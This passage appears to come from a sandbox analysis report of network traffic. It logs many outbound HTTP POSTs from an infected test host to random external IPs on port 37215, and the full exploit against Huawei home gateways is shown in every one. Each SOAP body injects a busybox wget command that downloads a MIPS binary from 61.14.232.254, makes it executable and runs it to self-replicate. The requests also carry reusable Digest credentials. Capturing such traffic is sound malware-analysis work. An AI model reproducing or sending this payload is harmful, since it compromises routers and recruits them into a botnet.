3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1449192.168.2.1345308197.188.8.17337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.562061071 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1450192.168.2.1338756157.12.24.24537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.562062025 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1451192.168.2.1335378157.161.95.16937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.562078953 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1452192.168.2.133682441.18.69.15537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.562102079 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1453192.168.2.1344024157.91.96.6137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.562118053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1454192.168.2.1335678157.74.159.7137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.562144041 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1455192.168.2.1352998146.187.15.21637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.562160969 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1456192.168.2.1333818157.13.115.12437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.562160969 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1457192.168.2.1335182197.134.197.2337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.562196970 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1458192.168.2.133567041.183.18.21137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.562206984 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1459192.168.2.1353184197.105.105.22937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.562244892 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
